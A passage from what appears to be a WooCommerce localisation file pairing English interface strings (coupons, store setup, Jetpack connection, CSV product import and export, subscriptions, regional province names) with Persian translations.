added.'=>'مبلغ در حال حاضر افزوده شده است.','Create account password'=>'ایجاد کلمه عبور حساب کاربری','Sorry, the order could not be found. Please contact us if you are having difficulty finding your order details.'=>'با عرض پوزش، سفارش پیدا نشد. اگر شما دچار مشکل پیدا کردن جزئیات سفارش خود شده اید، لطفا با ما تماس بگیرید.','Sorry, "%s" is no longer in stock so this order cannot be paid for. We apologize for any inconvenience caused.'=>'با عرض پوزش، "%s" دیگر موجود نیست، بنابراین این سفارش را نمی توان پرداخت کرد. از هر گونه دلخوری پیش آمده پوزش می طلبیم.','A list of your store\'s top-rated products.'=>'لیست فروشگاه شما براساس محصولات با امتیاز بیشتر.','Display a list of a customer\'s recently viewed products.'=>'نمایش لیست محصولات مشاهده شده اخیر مشتری‌ها.','A list of your store\'s products.'=>'یک لیست از محصولات فروشگاه شما.','Display a list of active product filters.'=>'نمایش یک لیست از فیلترهای فعال محصول.','%1$s should not be called before the %2$s action.'=>'%1$s نباید قبل از اقدام %2$s فراخوانی شود.','The class %1$s provided by %2$s filter must implement %3$s.'=>'کلاس %1$s که توسط فیلتر %2$s ارائه می‌شود، باید %3$s را پیاده‌سازی کند.','%1$s was called with an invalid level "%2$s".'=>'%1$s با سطح نامعتبر "%2$s" فراخوانی شد.','The provided handler %1$s does not implement %2$s.'=>'کنترل‌کننده‌ی ارائه شده‌ی %1$s، %2$s را پیاده‌سازی نمی‌کند.','Sorry, coupon "%s" is not applicable to selected products.'=>'با عرض پوزش، کد تخفیف "%s" برای محصولات انتخابی قابل اعمال نیست.','Invalid discount amount.'=>'مبلغ تخفیف نامعتبر است.','Page settingTerms and conditions'=>'شرایط و ضوابط','Post Type Counts'=>'تعداد نوع نوشته','Delete tax rates'=>'حذف نرخ‌های مالیات','WooCommerce transients'=>'ترنزینت‌های گذرای ووکامرس','This is where your business is located. Tax rates and shipping rates will use this address.'=>'این جایی است که کسب و کار شما واقع شده است. نرخ‌های مالیاتی و نرخ‌های حمل و نقل از این آدرس استفاده خواهند کرد.','This option will delete ALL of your tax rates, use with caution. This action cannot be reversed.'=>'این گزینه کلیه نرخ‌های مالیات تان را حذف خواهد کرد، با احتیاط استفاده کنید. این عمل قابل برگشت نیست.','Database Data Size'=>'اندازه داده‌های پایگاه داده','Forcing downloads will keep URLs hidden, but some servers may serve large files unreliably. If supported, %1$s / %2$s can be used to serve downloads instead (server requires %3$s).'=>'مجبور کردن دانلودها URL‌های پنهان را حفظ خواهد کرد، اما برخی از سرورها ممکن است به صورت غیر قابل اعتمادی فایل‌های بزرگ را ارائه کنند. اگر پشتیبانی شده باشد، %1$s / %2$s می تواند بجای آن برای ارائه دانلود‌ها استفاده شود (سرور نیاز به %3$s دارد).','Heads up! The versions of the following plugins you\'re running haven\'t been tested with WooCommerce %s. Please update them or confirm compatibility before updating WooCommerce, or you may experience issues:'=>'سرها بالا! نسخه‌های افزونه‌های زیر که در حال اجرا هستند با ووکامرس %s تست نشده است. لطفا قبل از بروزرسانی ووکامرس، آنها را بروز کنید یا از سازگاری آنها مطمئن شوید، یا ممکن است مشکلاتی را تجربه کنید:','Create pages'=>'ایجاد صفحات','Create default WooCommerce pages'=>'ایجاد صفحات پیشفرض ووکامرس','Database Index Size'=>'اندازه فهرست پایگاه داده','Total Database Size'=>'اندازه کل پایگاه داده','Country / State'=>'کشور / استان','The city in which your business is located.'=>'شهری که کسب و کار شما در آنجا قرار گرفته است.','Store Address'=>'آدرس فروشگاه','Update now'=>'هم اکنون بروزرسانی نمائید','Plugin'=>'افزونه','unknown'=>'ناشناخته','%s fee'=>'هزینه %s','The street address for your business location.'=>'آدرس خیابان برای محل تجارت شما.','The following active plugin(s) have not declared compatibility with WooCommerce %s yet and should be updated and examined further before you proceed:'=>'افزونه(های) فعال زیر سازگاری با ووکامرس %s را اعلام نکرده اند و قبل از اینکه شما ادامه دهید، باید آنها را بروزرسانی و بررسی نمائید:','Tested up to WooCommerce version'=>'تست شده تا نسخه ووکامرس','An additional, optional address line for your business location.'=>'یک خط آدرس اضافی اختیاری، برای محل کسب و کار شما.','The country and state or province, if any, in which your business is located.'=>'کشور و استان، در صورت وجود، که در آن کسب و کار شما واقع شده است.','The postal code, if any, in which your business is located.'=>'کد پستی، اگر وجود دارد، که در آن کسب و کار شما واقع شده است.','%s failed. Contact your hosting provider.'=>'%s ناموفق شد. با ارائه کننده میزبانی وب خود، تماس بگیرید.','Clear customer sessions'=>'پاک سازی جلسه‌های (Session) مشتری','Send order details to customer'=>'جزئیات سفارش را برای مشتری ارسال کنید','The file is empty or using a different encoding than UTF-8, please try again with a new file.'=>'فایل خالی است یا از کدگذاری‌های متفاوت از UTF-8 استفاده می کند، لطفا دوباره با یک فایل جدید امتحان کنید.','Below is a list of extensions available on your WooCommerce.com account. To receive extension updates please make sure the extension is installed, and its subscription activated and connected to your WooCommerce.com account. Extensions can be activated from the Plugins screen.'=>'در زیر لیستی از افزودنی‌های قابل دسترس در حساب کاربری WooCommerce.com شما وجود دارد. برای دریافت بروزرسانی‌های افزودنی، لطفا مطمئن شوید که افزودنی نصب شده است، و اشتراک آن فعال شده و به حساب کاربری WooCommerce.com شما متصل شده است. افزودنی‌ها را می توان از صفحه افزودنی‌ها فعال کرد.','Add shipping'=>'افزودن حمل و نقل','Order details manually sent to customer.'=>'جزئیات سفارش به صورت دستی به مشتری ارسال شد.','Choose an action...'=>'یک عمل را انتخاب نمائید...','Position'=>'موقعیت','Upload a new file'=>'آپلود یک فایل جدید','Sort by:'=>'ترتیب بر اساس:','Lifetime Subscription'=>'عضویت مادام العمر','Refund #%1$s - %2$s by %3$s'=>'استرداد #%1$s - %2$s توسط %3$s','The stock has not been updated because the value has changed since editing. Product %1$d has %2$d units in stock.'=>'موجودی بروز نشده است زیرا مقدار از زمان اصلاح، تغییر کرده است. محصول %1$d دارای %2$d واحد موجودی دارد.','Expired'=>'منقضی شده','Expiring Soon'=>'به زودی منقضی میشود','Update Available'=>'بروزرسانی در دسترس است','If you like %1$s please leave us a %2$s rating. A huge thanks in advance!'=>'اگر %1$s را دوست دارید، لطفا به ما یک امتیاز %2$s بدهید. پیشاپیش از شما سپاسگزاریم!','Transfer existing products to your new store — just import a CSV file.'=>'انتقال محصولات موجود به فروشگاه جدید شما - فقط یک فایل CSV وارد کنید.','Create a product'=>'ایجاد یک محصول','Import products'=>'درون ریزی محصولات','Have an existing store?'=>'یک فروشگاه موجود دارید؟','We\'re here for you — get tips, product updates, and inspiration straight to your mailbox.'=>'ما برای شما اینجا هستیم - راهنمایی‌ها، بروز رسانی‌های محصول و مشوق‌های صحیح را در صندوق پستی خود دریافت کنید.','Yes please!'=>'بله لطفا!','You\'re ready to start selling!'=>'شما آماده شروع فروش هستید!','Your site might be on a private network. Jetpack can only connect to public sites. Please make sure your site is visible over the internet, and then try connecting again 🙏.'=>'سایت شما ممکن است در یک شبکه خصوصی باشد. جت پک فقط می تواند به سایت‌های عمومی متصل شود. لطفا اطمینان حاصل کنید که سایت شما در اینترنت قابل مشاهده است، و سپس مجددا اتصال را امتحان کنید 🙏.','Sorry! We couldn\'t contact Jetpack just now 😭. Please make sure that your site is visible over the internet, and that it accepts incoming and outgoing requests via curl. You can also try to connect to Jetpack again, and if you run into any more issues, please contact support.'=>'با عرض پوزش! ما هم اکنون نتوانستیم با جت پک ارتباط برقرار کنیم 😭. لطفا اطمینان حاصل کنید که سایت شما در اینترنت قابل مشاهده است، و درخواست‌های ورودی و خروجی را از طریق curl قبول می کند. شما همچنین می توانید سعی کنید تا دوباره به جت پک متصل شوید، و اگر شما با هر گونه مسائل دیگر برخورد کردید، لطفا با پشتیبانی تماس بگیرید.','Sorry! We tried, but we couldn\'t install Jetpack for you 😭. Please go to the Plugins tab to install it, and finish setting up your store.'=>'با عرض پوزش! ما سعی کردیم، اما ما نمی توانیم جت پک را برای شما نصب کنیم 😭. برای نصب آن، به برگه افزونه‌ها بروید، و تنظیم فروشگاه خود را پایان دهید.','Sorry! We tried, but we couldn\'t connect Jetpack just now 😭. Please go to the Plugins tab to connect Jetpack, so that you can finish setting up your store.'=>'با عرض پوزش! ما سعی کردیم، اما هم اکنون نتوانستیم با جت پک ارتباط برقرار کنیم 😭. لطفا به برگه افزونه‌ها جهت ارتباط با جت پک بروید، تا بتوانید تنظیمات فروشگاه خود را به پایان برسانید.','Get insights on how your store is doing, including total sales, top products, and more.'=>'دریافت اطلاعات در مورد اینکه چگونه فروشگاه شما کار می کند، از جمله کل فروش‌ها، محصولات برتر و موارد دیگر.','Share new items on social media the moment they\'re live in your store.'=>'آیتم‌های جدید را در رسانه‌های اجتماعی، در لحظه ای که آنها در فروشگاه شما فعال میشوند، به اشتراک بگذارید.','Product promotion'=>'ترویج محصول','Store monitoring'=>'نظارت فروشگاه','Get an alert if your store is down for even a few minutes.'=>'زمانی که فروشگاه شما حتی برای چند دقیقه، متوقف (Down) می شود، یک هشدار دریافت کنید.','payment setup, automated taxes and discounted shipping labels'=>'برچسب راه اندازی پرداخت، نرخ زنده و تخفیف حمل و نقل','automated taxes'=>'مالیات‌های اتوماتیک','Connect your store to Jetpack to enable extra features'=>'فروشگاه خود را به جت پک متصل نمائید تا ویژگی‌های اضافی را فعال کنید','Finish setting up your store'=>'پایان تنظیم کردن فروشگاه شما','Store stats'=>'آمار فروشگاه','Better security'=>'امنیت بهتر','Connect your store to Jetpack'=>'ارتباط دادن فروشگاه شما با جت پک','Protect your store from unauthorized access.'=>'از فروشگاه خود در مقابل دسترسی غیرمجاز محافظت نمائید.','Bonus reasons you\'ll love Jetpack'=>'دلایل خوبی که شما جت پک را دوست خواهید داشت','By connecting your site you agree to our fascinating Terms of Service and to share details with WordPress.com'=>'با اتصال سایت شما، با شرایط خدمات شگفت انگیز ما و به اشتراک گذاری جزئیات با WordPress.com موافقت می نمائید','Sorry, we couldn\'t connect your store to Jetpack'=>'با عرض پوزش، ما نمیتوانیم فروشگاه شما را به جت پک وصل کنیم','Your store is almost ready! To activate services like %s, just connect with Jetpack.'=>'فروشگاه شما تقریبا آماده است! برای فعال کردن خدماتی مانند %s، فقط با جت پک ارتباط برقرار کنید.','Automated Taxes'=>'مالیات خودکار','Collect payments from customers offline.'=>'جمع آوری پرداخت‌ها از مشتریان به صورت آفلاین.','WooCommerce can accept both online and offline payments. Additional payment methods can be installed later.'=>'ووکامرس می تواند پرداخت‌های آنلاین و آفلاین را بپذیرد. روش‌های پرداخت اضافی را می‌توانید بعدا نصب کنید.','Storefront Theme'=>'قالب استورفرانت (Storefront)','PayPal email address:'=>'آدرس ایمیل PayPal:','Stripe email address'=>'آدرس ایمیل استرایپ (Stripe)','Stripe email address:'=>'آدرس ایمیل استرایپ (Stripe):','Activate'=>'فعال‌سازی','What type of products do you plan to sell?'=>'قصد فروش چه نوع محصولی را دارید؟','Shipping Zone'=>'منظقه حمل و نقل','Jetpack'=>'جت پک','Don\'t charge for shipping.'=>'برای حمل و نقل هزینه ای دریافت نکن.','Store setup'=>'برپایی فروشگاه','Terms and Conditions Page'=>'صفحه شرایط و ضوابط','What would you like to charge for flat rate shipping?'=>'چگونه مایلید برای حمل و نقل نرخ ساده، تعیین هزینه کنید؟','I plan to sell both physical and digital products'=>'من قصد دارم هر دو محصولات فیزیکی و دیجیتال را به فروش برسانم','I plan to sell digital products'=>'من قصد دارم تا محصولات دیجیتال را بفروشم','I plan to sell physical products'=>'من قصد دارم تا محصولات فیزیکی بفروشم','The following wizard will help you configure your store and get you started quickly.'=>'جادوگر زیر به شما کمک می کند تا فروشگاه خود را پیکربندی کنید و سریع شروع به کار کنید.','Shipping Method'=>'روش حمل و نقل','Flat Rate'=>'نرخ ساده','My Account Page'=>'صفحه حساب کاربری من','Checkout Page'=>'صفحه تسویه حساب','Cart Page'=>'صفحه سبد خرید','Shop Page'=>'صفحه فروشگاه','Set a fixed price to cover shipping costs.'=>'تنظیم یک مبلغ ثابت جهت پوشش هزینه‌های حمل و نقل.','Extensions %s'=>'افزونه‌ها %s','Coupon scheduled for: %s.'=>'کدتخفیف برای %s زمانبندی شد.','Zug'=>'Zug','Vaud'=>'Vaud','Valais'=>'Valais','Uri'=>'Uri','Ticino'=>'Ticino','Thurgau'=>'Thurgau','St. Gallen'=>'St. Gallen','Appenzell Innerrhoden'=>'Appenzell Innerrhoden','Appenzell Ausserrhoden'=>'Appenzell Ausserrhoden','Aargau'=>'Aargau','Zaire'=>'Zaire','Uíge'=>'Uíge','Namibe'=>'Namibe','Moxico'=>'Moxico','Malanje'=>'Malanje','Lunda-Sul'=>'Lunda-Sul','Lunda-Norte'=>'Lunda-Norte','Luanda'=>'Luanda','Kwanza-Sul'=>'Kwanza-Sul','Kwanza-Norte'=>'Kwanza-Norte','Kuando Kubango'=>'Kuando Kubango','Invalid coupon'=>'کد تخفیف نامعتبر','Solothurn'=>'Solothurn','Schwyz'=>'Schwyz','Schaffhausen'=>'Schaffhausen','Obwalden'=>'Obwalden','Nidwalden'=>'Nidwalden','Luzern'=>'Luzern','Jura'=>'Jura','Glarus'=>'Glarus','Geneva'=>'Geneva','Fribourg'=>'Fribourg','Bern'=>'Bern','Basel-Stadt'=>'Basel-Stadt','Basel-Landschaft'=>'Basel-Landschaft','Order scheduled for: %s.'=>'سفارش برای %s زمانبندی شد.','Enter a fixed amount or percentage to apply as a fee.'=>'یک مبلغ ثابت یا درصد ثابت را به عنوان هزینه وارد کنید.','Generic add/update/get meta methods should not be used for internal meta data, including "%s". Use getters and setters.'=>'نباید از متدهای عمومی add/update/get meta برای داده‌های داخلی، از جمله "%s"، استفاده شود. از getterها و setterها استفاده کنید.','Huambo'=>'Huambo','Bié'=>'Bié','Benguela'=>'Benguela','Bengo'=>'Bengo','Cunene'=>'Cunene','Cabinda'=>'Cabinda','Unable to use image "%s".'=>'نمی تواند از تصویر "%s" استفاده کند.','The "locations not covered by your other zones" zone cannot be updated.'=>'"مکان‌ها توسط نواحی شما پوشش داده نمی شوند" ناحیه نمی تواند بروزرسانی شود.','Product categories that the coupon will not be applied to, or that cannot be in the cart in order for the "Fixed cart discount" to be applied.'=>'دسته‌های محصولاتی که کدتخفیف روی آن‌ها اعمال نمی شود یا که نمی تواند در سبد خرید برای «تصحیح تخفیف سبد» اعمال شود.','Product categories that the coupon will be applied to, or that need to be in the cart in order for the "Fixed cart discount" to be applied.'=>'دسته‌های محصولاتی که کدتخفیف روی آن اعمال می شود، یا که نیازمند قرار گرفتن در سبد خرید برای اعمال «تصحیح تخفیف سبد» است.','Products that the coupon will not be applied to, or that cannot be in the cart in order for the "Fixed cart discount" to be applied.'=>'محصولاتی که کدتخفیف به آن‌ها اعمال نمی شود، یا که نمی تواند برای اعمال «تصحیح تخفیف سبد» در سبد قرار گیرد.','Products that the coupon will be applied to, or that need to be in the cart in order for the "Fixed cart discount" to be applied.'=>'محصولاتی که کدتخفیف به آن‌ها اعمال می شود یا که برای اعمال «تصحیح تخفیف سبد» نیازمند بودن در سبد خرید است.','Search results only'=>'فقط نتایج جستجو','Rated %1$s out of 5 based on %2$s customer rating'=>'امتیازدهی %1$s از 5 در %2$s امتیازدهی مشتری','Shop only'=>'فقط فروشگاه','Shop and search results'=>'نتایج جستجو و فروشگاه','Subject (paid)'=>'موضوع (پرداخت شده)','Invalid customer query.'=>'درخواست مشتری نامعتبر است.','List of upsell products IDs.'=>'لیست شناسه‌های محصولات پرفروش.','Available placeholders: %s'=>'جانگهدارهای دردسترس: %s','This order cannot be paid for. Please contact us if you need assistance.'=>'این سفارش نمی تواند پرداخت شود. اگر نیازمند راهنمایی هستید باما تماس بگیرید.','Please log in to your account below to continue to the payment form.'=>'لطفا برای ادامه مرحله پرداخت وارد حساب خود شوید.','A product with this SKU already exists.'=>'محصول با این موجودی وجود دارد.','A product with this ID already exists.'=>'محصول با این شناسه وجود دارد.','SKU %s'=>'موجودی محصول %s','ID %d'=>'شناسه %d','Not able to attach "%s".'=>'نمی توان پیوست کرد "%s".','Invalid product ID %d.'=>'شناسه محصول نامعتبر %d.','Invalid product type.'=>'نوع محصول نامعتبر.','Add New'=>'افزودن جدید','All Products'=>'همه محصولات','API Key generated successfully. Make sure to copy your new keys now as the secret key will be hidden once you leave this page.'=>'کلید API با موفقیت تولید شد. اطمینان حاصل کنید که کلید جدید را کپی کرده به عنوان کلید مخفی که بعد از ترک این برگه مخفی می شود.','House number and street name'=>'نام خیابان و پلاک خانه','Variation cannot be imported: Missing parent ID or parent does not exist yet.'=>'متغیر‌ها نمی تواند درون‌ریزی شود: از دست دادن شناسه والد یا والد هنوز وجود ندارد.','No matching product exists to update.'=>'هیچ محصول منطبقی برای به روز رسانی وجود ندارد.','Star ratings should be required, not optional'=>'امتیازدهی باید ضروری باشد نه دلخواه','Enable star rating on reviews'=>'فعالسازی امتیازدهی در نقدها','Reviews can only be left by "verified owners"'=>'نقدها فقط توسط "صاحب تأیید شده" باقی میمانند','Enable product reviews'=>'فعالسازی نقد محصول','The URL of your %s page (along with the Page ID).'=>'آدرس برگه %s (به همراه شناسه برگه ).','This tool allows you to generate and download a CSV file containing a list of all products.'=>'این ابزار به شما اجازه می دهد که فایلی با فرمت CSV حاوی لیست همه محصولات را ایجاد و دانلود کنید.','Which columns should be exported?'=>'کدام ستون‌ها باید صادر شود؟','Locations not covered by your other zones'=>'مکان‌هایی که در مناطق دیگر شما پوشش داده نمی شوند','Coupon restored'=>'کدتخفیف بازسازی شد','Product variations'=>'متغیرهای محصول','Yes, export all custom meta'=>'بله، همه متاهای سفارشی (Custom Meta) را برون ریزی کن','Export custom meta?'=>'برون ریزی متاهای سفارشی (Custom Meta)؟','The homepage URL of your site.'=>'آدرس URL برگه نخست سایت شما.','Generate CSV'=>'تولید CSV','Which product types should be exported?'=>'کدام یک از انواع محصول باید صادر شود؟','Product restored'=>'محصول بازسازی شد','Order restored'=>'سفارش بازسازی شد','Set Status - Out of stock'=>'تنظیم وضعیت - اتمام موجودی انبار','Set Status - In stock'=>'تنظیم وضعیت - موجود در انبار','Export all columns'=>'برون‌بری همه ستون‌ها','Export all products'=>'برون‌بری همه محصولات','Export Products'=>'برون‌بری محصولات','Export products to a CSV file'=>'برون‌بری محصولات در یک فایل CSV','Quantity in stockStock'=>'موجودی','Disconnect'=>'قطع شدن','My Subscriptions'=>'اشتراک من','Connected to WooCommerce.com'=>'متصل شده به WooCommerce.com','Inactive'=>'غیرفعال','CSV Delimiter'=>'حائل CSV','Update existing products'=>'بروزرسانی محصولات موجود','Your products are now being imported...'=>'محصولات شما در حال درون‌ریزی است...','Importing'=>'درون‌ریزی','Run the importer'=>'اجرای درون‌ریزی','Do not import'=>'درون‌ریزی نکن','Sample:'=>'نمونه:','Map to field'=>'نقشه به میدان','Column name'=>'نام ستون','Import Products'=>'درون‌ریزی محصولات','Reason for failure'=>'دلیل شکست','Import complete!'=>'درون‌ریزی کامل شد!','View import log'=>'مشاهده گزارش درون‌ریزی','Meta: %s'=>'متا: %s','External URL'=>'آدرس خارجی','Images'=>'تصاویر','Allow customer reviews?'=>'آیا به مشتری اجازه نوشتن نقد داده شود؟','Short description'=>'توضیح کوتاه','Visibility in catalog'=>'قابل مشاهده در کاتالوگ','Is featured?'=>'آیا ویژه است؟','Published'=>'منتشر شده','Done!'=>'انجام شد!','Upload CSV file'=>'بارگذاری پرونده CSV','Upgrade'=>'ارتقاء','Subscription: Unlimited'=>'اشتراک: نامحدود','Expired :('=>'منقضی شده :(','Parent SKU'=>'والد موجودی','WooCommerce Extensions'=>'افزودنی‌های ووکامرس','Product Title'=>'عنوان محصول','Choose a CSV file from your computer:'=>'انتخاب کنید پرونده CSV را از کامپیوترتان:','Select fields from your CSV file to map against products fields, or to ignore during import.'=>'فیلدها را از پرونده CSV برای نقشه روی زمینه‌های محصولات انتخاب کنید، یا درنظر نگیرید هنگام درون‌ریزی.','Map CSV fields to products'=>'نقشه فیلدهای CSV به محصولات','Date sale price ends'=>'تاریخ پایان فروش ویژه','Date sale price starts'=>'تاریخ شروع فروش ویژه','Invalid file type. The importer supports CSV and TXT file formats.'=>'نوع پرونده معتبر نیست. درون‌ریز تنها از فرمت TXT و CSV پشتیبانی می کند.','Installed Extensions without a Subscription'=>'نصب افزودنی‌ها بدون اشتراک انجام شد','Manage your subscriptions, get important product notifications, and updates, all from the convenience of your WooCommerce dashboard'=>'مدیریت اشتراک‌ها، گرفتن مهمترین اعلانات محصول، وبروزرسانی‌ها از همه به راحتی در پیشخوان ووکارس','Subscription: Using %1$d of %2$d sites available'=>'اشتراک: استفاده %1$d از %2$d سایت‌های دردسترس','Subscription: Not available - %1$d of %2$d already in use'=>'اشتراک: دردسترس نیست - %1$d از %2$d درحال استفاده','We\'ve made things simpler and easier to manage moving forward. From now on you can manage all your WooCommerce purchases directly from the Extensions menu within the WooCommerce plugin itself. View and manage your extensions now.'=>'ما همه چیز را ساده و راحت کردیم برای مدیریت. از حالا می توانید تمام پرداختی‌هایتان در ووکامرس را مستقیم از فهرست افزودنی‌ها با افزونه ووکامرس مدیریت کنید. مشاهده و مدیریت افزودنی‌های شما.','Alternatively, enter the path to a CSV file on your server:'=>'وارد کنید مسیر پرونده CSV در سرور خود:','Subscriptions'=>'اشتراک‌ها','File is empty. Please upload something more substantial. This error could also be caused by uploads being disabled in your php.ini or by post_max_size being defined as smaller than upload_max_filesize in php.ini.'=>'پرونده خالی است. لطفا چیزی قابل توجه‌تر بارگذاری کنید. این خطا ممکن است به دلیل غیرفعال بودن بارگذاری در php.ini یا بدلیل کوچ بودن مقدار post_max_size از upload_max_filesize در php.ini باشد.','Show advanced options'=>'نمایش گزینه‌های حرفه ای','Browse Extensions'=>'مرور افزونه‌ها','Hide advanced options'=>'مخفی کردن گزینه‌های حرفه ای','This tool allows you to import (or merge) product data to your store from a CSV or TXT file.'=>'این ابزار به شما اجازه درون‌ریزی (یا ادغام) اطلاعات محصول به فروشگاه شما از پرونده CSV یا TXT را می دهد.','Once connected, your WooCommerce.com purchases will be listed here.'=>'پس از اتصال، پرداختی‌های شما در WooCommerce.com در اینجا لیست می‌شود.','Could not find any subscriptions on your WooCommerce.com account'=>'هیچ اشتراکی در حساب کاربری WooCommerce.com شما یافت نشد','Download %d URL'=>'آدرس URL %d دانلود','Download %d name'=>'نام %d دانلود','Attribute %d default'=>'پیشفرض %d صفت','Attribute %d global'=>'صفت %d سراسری','Attribute %d visible'=>'نمایان بودن %d صفت','Attribute %d value(s)'=>'مقدار(های) %d صفت','Attribute %d name'=>'نام %d صفت','Backorders allowed?'=>'پیش‌فروش مجاز است؟','Attribute visibility'=>'قابل مشاهده بودن ویژگی','Is a global attribute?'=>'یک ویژگی عمومی است؟','Attribute value(s)'=>'مقدار ویژگی','Attribute name'=>'نام ویژگی','Download URL'=>'آدرس اینترنتی دانلود','Download name'=>'نام دانلود','External product'=>'محصول خارجی','Expires on:'=>'انقضا در:','Auto renews on:'=>'تمدید خودکار در:','Connect'=>'اتصال','Shared by %s'=>'اشتراک توسط %s','Column mapping'=>'نگاشت ستون','Expiring soon!'=>'به زودی منقضی می شود!','Download expiry days'=>'روز انقضاء دانلود','Default attribute'=>'ویژگی پیشفرض','%s product imported'=>'%s محصولات درون‌ریزی شد','%s product updated'=>'%s محصول بروز رسانی شد','%s product was skipped'=>'از %s کالا صرفنظر شده است','Failed to import %s product'=>'خطا در ورود %s محصول','Renew'=>'تجدید','WooCommerce Helper'=>'راهنمای ووکامرس','This is a featured product'=>'این یک محصول ویژه است','Create a new webhook'=>'ایجاد یک webhook جدید','The extension %s has been deactivated successfully.'=>'افزودنی‌ها %s با موفقیت غیرفعال شدند.','Subscription is expiring soon.'=>'اشتراک به زودی منقضی می شود.','Version %s is available.'=>'نسخه %s دردسترس است.','Authentication and subscription caches refreshed successfully.'=>'تأیید اعتبار و توافقنامه اشتراک با موفقیت تجدید شد.','An error has occurred when deactivating the extension %1$s. Please proceed to the Plugins screen to deactivate it manually.'=>'هنگام غیرفعالسازی افزودنی %1$s خطائی رخ داده است. لطفا صفحه افزونه را برای غیرفعالسازی دستی بررسی کنید.','An error has occurred when deactivating the subscription for %s. Please try again later.'=>'هنگام غیرفعالسازی اشتراک برای %s خطائی رخ داده است. لطفا بعدا تلاش کنید.','This subscription is expiring soon. Please renew to continue receiving updates and support.'=>'این اشتراک به زودی پایان می یابد. لطفا آن را تمدید نمائید تا ادامه پشتیبانی و بروزرسانی‌ها را دریافت نمائید.','This subscription has expired. Contact the owner to renew the subscription to receive updates and support.'=>'این اشتراک منقضی شده است. جهت تمدید اشتراک برای دریافت بروزرسانی‌ها و پشتیبانی، با مالک تماس بگیرید.','This subscription has expired. Please renew to receive updates and support.'=>'این اشتراک منقضی شده است. لطفا آن را تمدید نمائید تا پشتیبانی و بروزرسانی‌ها را دریافت نمائید.','Webhooks are event notifications sent to URLs of your choice. They can be used to integrate with third-party services which support them.'=>'وب هوک‌ها، اطلاعات رویدادها را به آدرس‌های URL انتخابی شما ارسال می کنند. آنها می توانند برای ادغام با سرویس‌های ثالثی که از آنها پشتیبانی می کنند، استفاده شود.','Sorting'=>'مرتب‌سازی','%s activated successfully. You will now receive updates for this product.'=>'%s با موفقیت فعال شد. شما هم اکنون بروزرسانی‌ها را برای این محصول دریافت خواهید کرد.','Safe and secure payments using credit cards or your customer\'s PayPal account.'=>'پرداخت‌های ایمن و مطمئن با استفاده از کارت‌های اعتباری یا حساب پی‌پال مشتری شما.','You have successfully connected your store to WooCommerce.com'=>'شما با موفقیت به WooCommerce.com متصل شدید','Looking for the WooCommerce Helper?'=>'آیا نیازمند کمک برای ووکامرس هستید؟','Subscription for %1$s deactivated successfully. You will no longer receive updates for this product. Click here if you wish to deactivate the plugin as well.'=>'اشتراک برای %1$s با موفقیت غیرفعال شد. شما دیگر برای این محصول، بروز رسانی دریافت نمی کنید. اگر مایل به غیرفعال کردن افزونه نیز هستید اینجا را کلیک کنید.','Subscription for %s deactivated successfully. You will no longer receive updates for this product.'=>'اشتراک برای %s با موفقیت غیرفعال شد. شما دیگر برای این محصول بروز رسانی دریافت نمی کنید.','An error has occurred when activating %s. Please try again later.'=>'هنگام فعال سازی %s خطایی رخ داده است. لطفا بعدا دوباره امتحان کنید.','Version %s is available. To enable this update you need to purchase a new subscription.'=>'نسخه %s در دسترس است است. برای فعال کردن این بروزرسانی، شما نیاز به خرید یک اشتراک جدید دارید.','To enable this update you need to purchase a new subscription.'=>'برای فعال کردن این بروزرسانی، شما نیاز به خرید یک اشتراک جدید دارید.','To enable this update you need to activate this subscription.'=>'برای فعال کردن این بروزرسانی نیاز به فعال کردن این اشتراک دارید.','This setting determines which shop pages products will be listed on.'=>'این تنظیمات تعیین می کند که کدام صفحات محصولات فروشگاه در لیست ذکر خواهند شد.','Filter by category'=>'فیلتر بر اساس دسته','Copy from billing address'=>'کپی از آدرس صورتحساب','Import products from a CSV file'=>'وارد کردن محصولات از یک فایل CSv','Filter by product type'=>'فیلتر با نوع محصول','Enable auto-renew'=>'فعال کردن تمدید خودکار','You have successfully disconnected your store from WooCommerce.com'=>'شما با موفقیت اتصالتان به WooCommerce.com را قطع کردید','Note: You currently have %2$d paid extension which should be updated first before updating WooCommerce.'=>'نکته: شما در حال حاضر %2$d افزودنی دارید که باید قبل از بروز رسانی ووکامرس، اول بروز رسانی شود.','WooCommerce products (CSV)'=>'محصولات ووکامرس (CSV)','Product Import'=>'درون‌ریزی محصول','Product Export'=>'برون‌بری محصول','Custom Link'=>'پیوند سفارشی','Back to Attributes'=>'بازگشت به ویژگی‌ها','Export'=>'برون‌بری','Import'=>'درون‌ریزی','Import products to your store via a csv file.'=>'درون‌ریزی محصولات در فروشگاه شما از طریق پرونده CSV.','WooCommerce Endpoint'=>'نقطه انتهایی ووکامرس','Are you sure you want to delete this log?'=>'آیا اطمینان دارید که می خواهید این گزارش را حذف کنید؟','The WooCommerce REST API allows external apps to view and manage store data. Access is granted only to those with valid API keys.'=>'REST API ووکامرس به برنامه‌های خارجی اجازه می دهد تا داده‌های فروشگاه را مشاهده و مدیریت نمایند. دسترسی فقط به آنهایی که دارای کلید API معتبر هستند، اعطا می شود.','Create an API key'=>'ایجاد یک کلید API','WooCommerce Services'=>'سرویس‌های ووکامرس','Vâlcea'=>'Vâlcea','Timiș'=>'Timiș','Sălaj'=>'Sălaj','Botoșani'=>'Botoșani','Maramureș'=>'Maramureș','Buzău'=>'Buzău','Galați'=>'Galați','Neamț'=>'Neamț','Mureș'=>'Mureș','Mehedinți'=>'Mehedinți','Constanța'=>'Constanța','Caraș-Severin'=>'Caraș-Severin','București'=>'București','Brașov'=>'Brașov','Brăila'=>'Brăila','Bistrița-Năsăud'=>'Bistrița-Năsăud','Bacău'=>'Bacău','Argeș'=>'Argeș','Ialomița'=>'Ialomița','Vrancea'=>'Vrancea','Vaslui'=>'Vaslui','Tulcea'=>'Tulcea','Teleorman'=>'Teleorman','Covasna'=>'Covasna','Prahova'=>'Prahova','Sibiu'=>'Sibiu','Dolj'=>'Dolj','Suceava'=>'Suceava','Satu Mare'=>'Satu Mare','Olt'=>'Olt','Hunedoara'=>'Hunedoara','Harghita'=>'Harghita','Gorj'=>'Gorj','Giurgiu'=>'Giurgiu','Cluj'=>'Cluj','Bihor'=>'Bihor','Arad'=>'Arad','Alba'=>'Alba','Ilfov'=>'Ilfov','Tarija'=>'Tarija','Potosí'=>'Potosí','Pando'=>'Pando','Oruro'=>'Oruro','La Paz'=>'La Paz','Cochabamba'=>'Cochabamba','Beni'=>'Beni','Chuquisaca'=>'Chuquisaca','Are you sure you want to log out? Confirm and log out'=>'آیا از خروج خود مطمئنید؟ تایید و خروج از سیستم','Unknown request method.'=>'روش درخواست ناشناخته.','Create'=>'ایجاد','Value (required)'=>'مقدار (ضروری)','Name (required)'=>'نام 